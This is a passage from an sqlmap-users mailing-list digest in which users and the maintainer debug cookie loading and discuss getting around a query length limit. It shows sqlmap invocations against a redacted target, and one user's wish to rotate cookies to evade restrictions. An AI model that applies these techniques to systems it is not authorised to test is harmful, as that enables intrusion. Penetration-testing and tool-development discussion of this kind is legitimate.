  48. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar)
  49. Blind SQL Injection question (Guy Dufour)
  50. Re: Blind SQL Injection question (Chris Oakley)
  51. Re: Passing SOAPAction in --header (Brandon Perry)
  52. Re: Passing SOAPAction in --header (Brandon Perry)
  53. Deploy&Create SSH/tunnel with compromised MSSQL	server
      (Alok Kumar)
  54. Re: Deploy&Create SSH/tunnel with compromised MSSQL	server
      (Brandon Perry)
  55. Re: Deploy&Create SSH/tunnel with compromised MSSQL	server
      (Alok Kumar)
  56. Re: Deploy&Create SSH/tunnel with compromised MSSQL	server
      (Brandon Perry)
  57. SQLMAP Bug (Joe O'Hara)
  58. Re: SQLMAP Bug (Miroslav Stampar)
  59. [CRITICAL] (Thai Thao)
  60. Re: [CRITICAL] (Miroslav Stampar)
  61. Providing multiple dbms (Sebastian Nerz)
  62. Re: Providing multiple dbms (Miroslav Stampar)


----------------------------------------------------------------------

Message: 1
Date: Sat, 13 Apr 2013 21:40:39 -0300
From: David Guimaraes <sk...@gm...>
Subject: Re: [sqlmap-users] Feature request
To: Miroslav Stampar <mir...@gm...>
Cc: SqlMap List <sql...@li...>
Message-ID:
	<CAJ...@ma...>
Content-Type: text/plain; charset="iso-8859-1"

Good question Miroslav.. I tried to think in something that can be
implemented without ruin sqlmap query schema, but I could not come to any
conclusion... =(

The thing is, sqlsus use a different approch to dump the data, making this
kind of thing possible...

The solution that I found in this particular scenario is to use sqlsus,
unfortunately...

Regards.

David


On Mon, Apr 1, 2013 at 6:35 PM, Miroslav Stampar <mir...@gm...
> wrote:

> Hi David.
>
> And what do you recommend to be done in case of query with length >
> max_inj_length?
>
> Kind regards,
> Miroslav Stampar
> On Apr 1, 2013 11:14 PM, "David Guimaraes" <sk...@gm...> wrote:
>
>> Hi, I am trying to perform sql injection on a web site but I can not get
>> successful due to a size limitation on the query sent to the server. The
>> server is limiting the size of query in 512 bytes only and sqlmap do not
>> have any customization that allows me to bypass this restriction like
>> sqlsus "max_inj_length" parameter. Sqlsus has a feature called "autoconf"
>> that measure the permited query size.
>>
>> There is some chance to put this kind of feature in sqlmap?
>>
>> Thanks.
>>
>> --
>> David Gomes Guimar?es
>>
>>
>> ------------------------------------------------------------------------------
>> Own the Future-IntelLevel Up Game Demo Contest 2013
>> Rise to greatness in Intel's independent game demo contest.
>> Compete for recognition, cash, and the chance to get your game
>> on Steam. $5K grand prize plus 10 genre and skill prizes.
>> Submit your demo by 6/6/13. http://p.sf.net/sfu/intel_levelupd2d
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>


-- 
David Gomes Guimar?es
-------------- next part --------------
An HTML attachment was scrubbed...

------------------------------

Message: 2
Date: Mon, 15 Apr 2013 11:36:37 +0200
From: Dirk Wetter <sp...@dr...>
Subject: Re: [sqlmap-users] --load-cookies
To: Miroslav Stampar <mir...@gm...>
Cc: SqlMap List <sql...@li...>
Message-ID: <516...@dr...>
Content-Type: text/plain; charset=ISO-8859-1



On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
> Nevertheless, with the latest commit that check should be "neutralized" now. Could you please retry it now?

thx, Miroslav.  I tried (b6fee63) but this time the cookie parser lib hiccups, using the same file:

/usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib bug!
Traceback (most recent call last):
  File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in _really_load
    assert domain_specified == initial_dot
AssertionError

  _warn_unhandled_exception()
[11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid Netscape format cookies file '/tmp/sqlmapcj-pbP7P1': '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')

the 999.. looks strange to me.

>  
>
> On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <mir...@gm... <mailto:mir...@gm...>> wrote:
>
>     Hi Dirk.
>      
>     Well, I would say that you have an expired cookie. Do you see that value 0? That value should be a valid UNIX time representing time of cookie expiration. Also, I've just tested that cookie of yours and sqlmap says: "[WARNING] cookie '....' has expired"
>

that's true but IMO 0 represents just a session cookie. Example:

prompt% wget -q -O /dev/null --keep-session-cookies --save-cookies=/dev/stdout bing.com
# HTTP cookie file.
# Generated by Wget on 2013-04-15 11:23:13.
# Edit at your own risk.

.bing.com       TRUE    /       FALSE   1429089794      SRCHUSR AUTOREDIR=0&GEOVAR=&DOB=20130415
.bing.com       TRUE    /       FALSE   1429089794      SRCHD   D=2781203&MS=2781203&AF=NOFORM
.bing.com       TRUE    /       FALSE   1429089794      OrigMUID        333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
.bing.com       TRUE    /       FALSE   1429089794      MUID    333995A69E06630B2EB491169F016314
.bing.com       TRUE    /       FALSE   0       _SS     SID=B954CB7EDF8643CABAD8013F27A241E7
.bing.com       TRUE    /       FALSE   0       _HOP
.bing.com       TRUE    /       FALSE   0       _FS     NU=1
.bing.com       TRUE    /       FALSE   1429089794      _FP     EM=1
www.bing.com    FALSE   /       FALSE   1429089794      SRCHUID V=2&GUID=975091780DFF407DA9DD07139FD97C4D
www.bing.com    FALSE   /       FALSE   1429089794      MUIDB   333995A69E06630B2EB491169F016314

prompt%

Same parser problem btw if I edit the cookie file and put 1429089794 unix time instead of 0 in there.

Ok: With the prev rev  ed5599f it reads this file ok (no session cookies but cookies w/ expiration date) and uses the last
cookie only for the first 120 tries.

Cheers, Dirk


>      
>     Kind regards,
>     Miroslav Stampar
>
>
>     On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr... <mailto:sp...@dr...>> wrote:
>
>
>         Hi Miroslav,
>
>         thx for your prompt answer.
>
>         On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
>         > Hi Dirk.
>         >
>         > Could you please get the latest revision and retry it again?
>         ed5599f: almost the same: with cookie in the header sqlmap takes only this one.
>         The slight difference seems to be that in the case where I didn't supply a cookie
>         sqlmap doesn't use any cookie at all, i.e. now not the one from the server anymore.
>         >
>         > There was a situation where info messages have been wrongly written that original response contained Set-Cookie in situations like yours.
>         >
>         > In case that everything stays as it is, I'll need to ask you to provide more details. For example, cookie file would be great.
>
>         sure, here you go:
>
>         --snip
>         # Netscape HTTP Cookie File
>         <FQDN>  \t  FALSE  \t  <path>  \t  TRUE  \t  0  \t  JSESSIONID  \t  <Cookie>
>         [..]
>         --snap
>
>         They are all session cookies. For easier reading here I put some blanks in the line
>         above, in "cookie-file" there aren't any though. Cookies were generated with
>         stompy and a shell script (looks he same as with
>         wget -S -O /dev/null --keep-session-cookies --save-cookies=<file> <URL>)
>
>         Again: sqlmap doesn't hiccup/complain while eating my cookies file ;-)
>
>         >
>         > Also, please make sure that the cookie file contains proper cookie(s) - domain name should be the same as a domain of target, cookie needs to have a proper valid time, etc.
>
>         see above.
>
>         Cheers,
>
>         Dirk
>
>         >
>         >
>         > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>> wrote:
>         >
>         >     Hi Miroslav,
>         >
>         >     yes unfortunately.
>         >
>         >     If I omit the cookie line in the request header completely, sqlmap
>         >     seems to take the first cookie issued by the server with set-cookie (and
>         >     put's it silently in).
>         >
>         >     Cheers,
>         >
>         >     Dirk
>         >
>         >
>         >
>         >     On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
>         >     > Hi.
>         >     >
>         >     > And this is also happening if you are skipping "Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
>         >     >
>         >     > Kind regards,
>         >     > Miroslav Stampar
>         >     >
>         >     >
>         >     > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>>> wrote:
>         >     >
>         >     >
>         >     >     Hi folks,
>         >     >
>         >     >     .... that doesn't work for me. It always uses the cookie supplied
>         >     >     (below in $REQUEST, or if I omit the line in $REQUEST the one
>         >     >     from the 1st server reply is being used)
>         >     >
>         >     >     So what is wrong in here:
>         >     >
>         >     >     cd ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
>         >     >     ./sqlmap.py --ignore-proxy --force-ssl --beep \
>         >     >       --threads=8 -v 6 --load-cookies=$WD/cookie-file \
>         >     >       --level=2 --risk=2 -r $REQUEST
>         >     >
>         >     >     The content of the file $REQUEST is:
>         >     >
>         >     >     POST <URL> HTTP/1.1
>         >     >     Host: <HOST>
>         >     >     User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko)
>         >     >     Chrome/0.2.149.6 <http://0.2.149.6> <http://0.2.149.6> <http://0.2.149.6> Safari/525.13
>         >     >     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>         >     >     Accept-Language: en-US,en;q=0.5
>         >     >     Accept-Encoding: gzip, deflate
>         >     >     Referer: <Referer>
>         >     >     Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
>         >     >     Connection: keep-alive
>         >     >     Content-Type: application/x-www-form-urlencoded
>         >     >     Content-Length: 67
>         >     >
>         >     >     <abunchofpostparams>
>         >     >
>         >     >
>         >     >     No hints that cookie-file is not in correct format (I've been through this,
>         >     >     at least I think I so ;) ).
>         >     >
>         >     >     Any insight would be much appreciated.
>         >     >
>         >     >
>         >     >     Cheers,
>         >     >
>         >     >     Dirk
>         >     >
>         >     >
>         >     >     ------------------------------------------------------------------------------
>         >     >     Precog is a next-generation analytics platform capable of advanced
>         >     >     analytics on semi-structured data. The platform includes APIs for building
>         >     >     apps and a phenomenal toolset for data science. Developers can use
>         >     >     our toolset for easy data analysis & visualization. Get a free account!
>         >     >     http://www2.precog.com/precogplatform/slashdotnewsletter
>         >     >     _______________________________________________
>         >     >     sqlmap-users mailing list
>         >     >     sql...@li... <mailto:sql...@li...> <mailto:sql...@li... <mailto:sql...@li...>> <mailto:sql...@li... <mailto:sql...@li...> <mailto:sql...@li... <mailto:sql...@li...>>>
>         >     >     https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>         >     >
>         >     >
>         >     >
>         >     >
>         >     > --
>         >     > Miroslav Stampar
>         >     > http://about.me/stamparm
>         >
>         >
>         >
>         >
>         > --
>         > Miroslav Stampar
>         > http://about.me/stamparm
>
>
>
>
>     -- 
>     Miroslav Stampar
>     http://about.me/stamparm
>
>
>
>
> -- 
> Miroslav Stampar
> http://about.me/stamparm




------------------------------

Message: 3
Date: Mon, 15 Apr 2013 11:45:19 +0200
From: Miroslav Stampar <mir...@gm...>
Subject: Re: [sqlmap-users] --load-cookies
To: Dirk Wetter <sp...@dr...>
Cc: SqlMap List <sql...@li...>
Message-ID:
	<CA+9yoX0yAGFkCiLuycVqdbm8jvnMeEPgJdXoYZi_4NTW-YQo=Q...@ma...>
Content-Type: text/plain; charset="iso-8859-1"

Hi Dirk.

Now that crash should be "patched".

Could you please retry it now and say if the latest revision suits your
needs?

Kind regards,
Miroslav Stampar


On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr...> wrote:

>
>
> On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
> > Nevertheless, with the latest commit that check should be "neutralized"
> now. Could you please retry it now?
>
> thx, Miroslav.  I tried (b6fee63) but this time the cookie parser lib
> hiccups, using the same file:
>
> /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib bug!
> Traceback (most recent call last):
>   File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in
> _really_load
>     assert domain_specified == initial_dot
> AssertionError
>
>   _warn_unhandled_exception()
> [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid
> Netscape format cookies file '/tmp/sqlmapcj-pbP7P1':
> '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
>
> the 999.. looks strange to me.
>
> >
> >
> > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <
> mir...@gm... <mailto:mir...@gm...>> wrote:
> >
> >     Hi Dirk.
> >
> >     Well, I would say that you have an expired cookie. Do you see that
> value 0? That value should be a valid UNIX time representing time of cookie
> expiration. Also, I've just tested that cookie of yours and sqlmap says:
> "[WARNING] cookie '....' has expired"
> >
>
> that's true but IMO 0 represents just a session cookie. Example:
>
> prompt% wget -q -O /dev/null --keep-session-cookies
> --save-cookies=/dev/stdout bing.com
> # HTTP cookie file.
> # Generated by Wget on 2013-04-15 11:23:13.
> # Edit at your own risk.
>
> .bing.com       TRUE    /       FALSE   1429089794      SRCHUSR
> AUTOREDIR=0&GEOVAR=&DOB=20130415
> .bing.com       TRUE    /       FALSE   1429089794      SRCHD
> D=2781203&MS=2781203&AF=NOFORM
> .bing.com       TRUE    /       FALSE   1429089794      OrigMUID
>  333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
> .bing.com       TRUE    /       FALSE   1429089794      MUID
>  333995A69E06630B2EB491169F016314
> .bing.com       TRUE    /       FALSE   0       _SS
> SID=B954CB7EDF8643CABAD8013F27A241E7
> .bing.com       TRUE    /       FALSE   0       _HOP
> .bing.com       TRUE    /       FALSE   0       _FS     NU=1
> .bing.com       TRUE    /       FALSE   1429089794      _FP     EM=1
> www.bing.com    FALSE   /       FALSE   1429089794      SRCHUID
> V=2&GUID=975091780DFF407DA9DD07139FD97C4D
> www.bing.com    FALSE   /       FALSE   1429089794      MUIDB
> 333995A69E06630B2EB491169F016314
>
> prompt%
>
> Same parser problem btw if I edit the cookie file and put 1429089794 unix
> time instead of 0 in there.
>
> Ok: With the prev rev  ed5599f it reads this file ok (no session cookies
> but cookies w/ expiration date) and uses the last
> cookie only for the first 120 tries.
>
> Cheers, Dirk
>
>
> >
> >     Kind regards,
> >     Miroslav Stampar
> >
> >
> >     On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...<mailto:
> sp...@dr...>> wrote:
> >
> >
> >         Hi Miroslav,
> >
> >         thx for your prompt answer.
> >
> >         On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
> >         > Hi Dirk.
> >         >
> >         > Could you please get the latest revision and retry it again?
> >         ed5599f: almost the same: with cookie in the header sqlmap takes
> only this one.
> >         The slight difference seems to be that in the case where I
> didn't supply a cookie
> >         sqlmap doesn't use any cookie at all, i.e. now not the one from
> the server anymore.
> >         >
> >         > There was a situation where info messages have been wrongly
> written that original response contained Set-Cookie in situations like
> yours.
> >         >
> >         > In case that everything stays as it is, I'll need to ask you
> to provide more details. For example, cookie file would be great.
> >
> >         sure, here you go:
> >
> >         --snip
> >         # Netscape HTTP Cookie File
> >         <FQDN>  \t  FALSE  \t  <path>  \t  TRUE  \t  0  \t  JSESSIONID
>  \t  <Cookie>
> >         [..]
> >         --snap
> >
> >         They are all session cookies. For easier reading here I put some
> blanks in the line
> >         above, in "cookie-file" there aren't any though. Cookies were
> generated with
> >         stompy and a shell script (looks he same as with
> >         wget -S -O /dev/null --keep-session-cookies
> --save-cookies=<file> <URL>)
> >
> >         Again: sqlmap doesn't hiccup/complain while eating my cookies
> file ;-)
> >
> >         >
> >         > Also, please make sure that the cookie file contains proper
> cookie(s) - domain name should be the same as a domain of target, cookie
> needs to have a proper valid time, etc.
> >
> >         see above.
> >
> >         Cheers,
> >
> >         Dirk
> >
> >         >
> >         >
> >         > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <
> sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto:
> sp...@dr...>>> wrote:
> >         >
> >         >     Hi Miroslav,
> >         >
> >         >     yes unfortunately.
> >         >
> >         >     If I omit the cookie line in the request header
> completely, sqlmap
> >         >     seems to take the first cookie issued by the server with
> set-cookie (and
> >         >     put's it silently in).
> >         >
> >         >     Cheers,
> >         >
> >         >     Dirk
> >         >
> >         >
> >         >
> >         >     On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
> >         >     > Hi.
> >         >     >
> >         >     > And this is also happening if you are skipping "Cookie:
> JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
> >         >     >
> >         >     > Kind regards,
> >         >     > Miroslav Stampar
> >         >     >
> >         >     >
> >         >     > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <
> sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto:
> sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...>
> <mailto:sp...@dr... <mailto:sp...@dr...>>>> wrote:
> >         >     >
> >         >     >
> >         >     >     Hi folks,
> >         >     >
> >         >     >     .... that doesn't work for me. It always uses the
> cookie supplied
> >         >     >     (below in $REQUEST, or if I omit the line in
> $REQUEST the one
> >         >     >     from the 1st server reply is being used)
> >         >     >
> >         >     >     So what is wrong in here:
> >         >     >
> >         >     >     cd
> ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
> >         >     >     ./sqlmap.py --ignore-proxy --force-ssl --beep \
> >         >     >       --threads=8 -v 6 --load-cookies=$WD/cookie-file \
> >         >     >       --level=2 --risk=2 -r $REQUEST
> >         >     >
> >         >     >     The content of the file $REQUEST is:
> >         >     >
> >         >     >     POST <URL> HTTP/1.1
> >         >     >     Host: <HOST>
> >         >     >     User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2;
> en-US) AppleWebKit/525.13 (KHTML, like Gecko)
> >         >     >     Chrome/0.2.149.6 <http://0.2.149.6> <
> http://0.2.149.6> <http://0.2.149.6> Safari/525.13
> >         >     >     Accept:
> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> >         >     >     Accept-Language: en-US,en;q=0.5
> >         >     >     Accept-Encoding: gzip, deflate
> >         >     >     Referer: <Referer>
> >         >     >     Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
> >         >     >     Connection: keep-alive
> >         >     >     Content-Type: application/x-www-form-urlencoded
> >         >     >     Content-Length: 67
> >         >     >
> >         >     >     <abunchofpostparams>
> >         >     >
> >         >     >
> >         >     >     No hints that cookie-file is not in correct format
> (I've been through this,
> >         >     >     at least I think I so ;) ).
> >         >     >
> >         >     >     Any insight would be much appreciated.
> >         >     >
> >         >     >
> >         >     >     Cheers,
> >         >     >
> >         >     >     Dirk
> >         >     >
> >         >     >
> >         >     >
> ------------------------------------------------------------------------------
> >         >     >     Precog is a next-generation analytics platform
> capable of advanced
> >         >     >     analytics on semi-structured data. The platform
> includes APIs for building
> >         >     >     apps and a phenomenal toolset for data science.
> Developers can use
> >         >     >     our toolset for easy data analysis & visualization.
> Get a free account!
> >         >     >
> http://www2.precog.com/precogplatform/slashdotnewsletter
> >         >     >     _______________________________________________
> >         >     >     sqlmap-users mailing list
> >         >     >     sql...@li... <mailto:
> sql...@li...> <mailto:
> sql...@li... <mailto:
> sql...@li...>> <mailto:
> sql...@li... <mailto:
> sql...@li...> <mailto:
> sql...@li... <mailto:
> sql...@li...>>>
> >         >     >
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >         >     >
> >         >     >
> >         >     >
> >         >     >
> >         >     > --
> >         >     > Miroslav Stampar
> >         >     > http://about.me/stamparm
> >         >
> >         >
> >         >
> >         >
> >         > --
> >         > Miroslav Stampar
> >         > http://about.me/stamparm
> >
> >
> >
> >
> >     --
> >     Miroslav Stampar
> >     http://about.me/stamparm
> >
> >
> >
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
>
>


-- 
Miroslav Stampar
http://about.me/stamparm
-------------- next part --------------
An HTML attachment was scrubbed...

------------------------------

Message: 4
Date: Mon, 15 Apr 2013 11:46:21 +0200
From: Miroslav Stampar <mir...@gm...>
Subject: Re: [sqlmap-users] Patch for /task/<task_id>/delete in
	clean_filesystem
To: Brandon Perry <bpe...@gm...>
Cc: sqlmap users <sql...@li...>
Message-ID:
	<CA+9yoX3RNQDm=PqT...@ma...>
Content-Type: text/plain; charset="iso-8859-1"

Hi Brandon.

Thank you for your patch and find it now included [1].

Kind regards,
Miroslav Stampar

[1]
https://github.com/sqlmapproject/sqlmap/commit/8853e43616e89f26cfd6d1c1540e02ed6b4ca224


On Sat, Apr 13, 2013 at 8:36 PM, Brandon Perry <bpe...@gm...>wrote:

> Hi, the attached patch fixes an issue with the /task/<task_id>/delete api
> call when self.output_directory is NoneType and clean_system() is called.
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website
>
>
> ------------------------------------------------------------------------------
> Precog is a next-generation analytics platform capable of advanced
> analytics on semi-structured data. The platform includes APIs for building
> apps and a phenomenal toolset for data science. Developers can use
> our toolset for easy data analysis & visualization. Get a free account!
> http://www2.precog.com/precogplatform/slashdotnewsletter
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm
-------------- next part --------------
An HTML attachment was scrubbed...

------------------------------

Message: 5
Date: Mon, 15 Apr 2013 12:19:13 +0200
From: Dirk Wetter <sp...@dr...>
Subject: Re: [sqlmap-users] --load-cookies
To: Miroslav Stampar <mir...@gm...>
Cc: SqlMap List <sql...@li...>
Message-ID: <516...@dr...>
Content-Type: text/plain; charset=ISO-8859-1

Hi Miroslav,

On 04/15/2013 11:45 AM, Miroslav Stampar wrote:
> Hi Dirk.
>
> Now that crash should be "patched".
>
> Could you please retry it now and say if the latest revision suits your needs?

cool, thx. Works!

However (sorry):

One needs to omit the cookie in the request header, otherwise it just uses the one
supplied by the request.

Then: It doesn't change the cookie. Maybe I was interpreting that not correctly
but my point was using the load-cookies option to direct sqlmap to change
cookies once in a while (whenever that's gonna be). This is to circumvent
restrictions one can encounter otherwise....

Cheers,

Dirk


>
> Kind regards,
> Miroslav Stampar
>
>
> On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr... <mailto:sp...@dr...>> wrote:
>
>
>
>     On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
>     > Nevertheless, with the latest commit that check should be "neutralized" now. Could you please retry it now?
>
>     thx, Miroslav.  I tried (b6fee63) but this time the cookie parser lib hiccups, using the same file:
>
>     /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib bug!
>     Traceback (most recent call last):
>       File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in _really_load
>         assert domain_specified == initial_dot
>     AssertionError
>
>       _warn_unhandled_exception()
>     [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid Netscape format cookies file '/tmp/sqlmapcj-pbP7P1': '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
>
>     the 999.. looks strange to me.
>
>     >
>     >
>     > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <mir...@gm... <mailto:mir...@gm...> <mailto:mir...@gm... <mailto:mir...@gm...>>> wrote:
>     >
>     >     Hi Dirk.
>     >
>     >     Well, I would say that you have an expired cookie. Do you see that value 0? That value should be a valid UNIX time representing time of cookie expiration. Also, I've just tested that cookie of yours and sqlmap says: "[WARNING] cookie '....' has expired"
>     >
>
>     that's true but IMO 0 represents just a session cookie. Example:
>
>     prompt% wget -q -O /dev/null --keep-session-cookies --save-cookies=/dev/stdout bing.com <http://bing.com>
>     # HTTP cookie file.
>     # Generated by Wget on 2013-04-15 11:23:13.
>     # Edit at your own risk.
>
>     .bing.com <http://bing.com>       TRUE    /       FALSE   1429089794      SRCHUSR AUTOREDIR=0&GEOVAR=&DOB=20130415
>     .bing.com <http://bing.com>       TRUE    /       FALSE   1429089794      SRCHD   D=2781203&MS=2781203&AF=NOFORM
>     .bing.com <http://bing.com>       TRUE    /       FALSE   1429089794      OrigMUID        333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
>     .bing.com <http://bing.com>       TRUE    /       FALSE   1429089794      MUID    333995A69E06630B2EB491169F016314
>     .bing.com <http://bing.com>       TRUE    /       FALSE   0       _SS     SID=B954CB7EDF8643CABAD8013F27A241E7
>     .bing.com <http://bing.com>       TRUE    /       FALSE   0       _HOP
>     .bing.com <http://bing.com>       TRUE    /       FALSE   0       _FS     NU=1
>     .bing.com <http://bing.com>       TRUE    /       FALSE   1429089794      _FP     EM=1
>     www.bing.com <http://www.bing.com>    FALSE   /       FALSE   1429089794      SRCHUID V=2&GUID=975091780DFF407DA9DD07139FD97C4D
>     www.bing.com <http://www.bing.com>    FALSE   /       FALSE   1429089794      MUIDB   333995A69E06630B2EB491169F016314
>
>     prompt%
>
>     Same parser problem btw if I edit the cookie file and put 1429089794 unix time instead of 0 in there.
>
>     Ok: With the prev rev  ed5599f it reads this file ok (no session cookies but cookies w/ expiration date) and uses the last
>     cookie only for the first 120 tries.
>
>     Cheers, Dirk
>
>
>     >
>     >     Kind regards,
>     >     Miroslav Stampar
>     >
>     >
>     >     On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>> wrote:
>     >
>     >
>     >         Hi Miroslav,
>     >
>     >         thx for your prompt answer.
>     >
>     >         On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
>     >         > Hi Dirk.
>     >         >
>     >         > Could you please get the latest revision and retry it again?
>     >         ed5599f: almost the same: with cookie in the header sqlmap takes only this one.
>     >         The slight difference seems to be that in the case where I didn't supply a cookie
>     >         sqlmap doesn't use any cookie at all, i.e. now not the one from the server anymore.
>     >         >
>     >         > There was a situation where info messages have been wrongly written that original response contained Set-Cookie in situations like yours.
>     >         >
>     >         > In case that everything stays as it is, I'll need to ask you to provide more details. For example, cookie file would be great.
>     >
>     >         sure, here you go:
>     >
>     >         --snip
>     >         # Netscape HTTP Cookie File
>     >         <FQDN>  \t  FALSE  \t  <path>  \t  TRUE  \t  0  \t  JSESSIONID  \t  <Cookie>
>     >         [..]
>     >         --snap
>     >
>     >         They are all session cookies. For easier reading here I put some blanks in the line
>     >         above, in "cookie-file" there aren't any though. Cookies were generated with
>     >         stompy and a shell script (looks he same as with
>     >         wget -S -O /dev/null --keep-session-cookies --save-cookies=<file> <URL>)
>     >
>     >         Again: sqlmap doesn't hiccup/complain while eating my cookies file ;-)
>     >
>     >         >
>     >         > Also, please make sure that the cookie file contains proper cookie(s) - domain name should be the same as a domain of target, cookie needs to have a proper valid time, etc.
>     >
>     >         see above.
>     >
>     >         Cheers,
>     >
>     >         Dirk
>     >
>     >         >
>     >         >
>     >         > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>>> wrote:
>     >         >
>     >         >     Hi Miroslav,
>     >         >
>     >         >     yes unfortunately.
>     >         >
>     >         >     If I omit the cookie line in the request header completely, sqlmap
>     >         >     seems to take the first cookie issued by the server with set-cookie (and
>     >         >     put's it silently in).
>     >         >
>     >         >     Cheers,
>     >         >
>     >         >     Dirk
>     >         >
>     >         >
>     >         >
>     >         >     On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
>     >         >     > Hi.
>     >         >     >
>     >         >     > And this is also happening if you are skipping "Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
>     >         >     >
>     >         >     > Kind regards,
>     >         >     > Miroslav Stampar
>     >         >     >
>     >         >     >
>     >         >     > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>>>> wrote:
>     >         >     >
>     >         >     >
>     >         >     >     Hi folks,
>     >         >     >
>     >         >     >     .... that doesn't work for me. It always uses the cookie supplied
>     >         >     >     (below in $REQUEST, or if I omit the line in $REQUEST the one
>     >         >     >     from the 1st server reply is being used)
>     >         >     >
>     >         >     >     So what is wrong in here:
>     >         >     >
>     >         >     >     cd ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
>     >         >     >     ./sqlmap.py --ignore-proxy --force-ssl --beep \
>     >         >     >       --threads=8 -v 6 --load-cookies=$WD/cookie-file \
>     >         >     >       --level=2 --risk=2 -r $REQUEST
>     >         >     >
>     >         >     >     The content of the file $REQUEST is:
>     >         >     >
>     >         >     >     POST <URL> HTTP/1.1
>     >         >     >     Host: <HOST>
>     >         >     >     User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko)
>     >         >     >     Chrome/0.2.149.6 <http://0.2.149.6> <http://0.2.149.6> <http://0.2.149.6> <http://0.2.149.6> Safari/525.13
>     >         >     >     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>     >         >     >     Accept-Language: en-US,en;q=0.5
>     >         >     >     Accept-Encoding: gzip, deflate
>     >         >     >     Referer: <Referer>
>     >         >     >     Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
>     >         >     >     Connection: keep-alive
>     >         >     >     Content-Type: application/x-www-form-urlencoded
>     >         >     >     Content-Length: 67
>     >         >     >
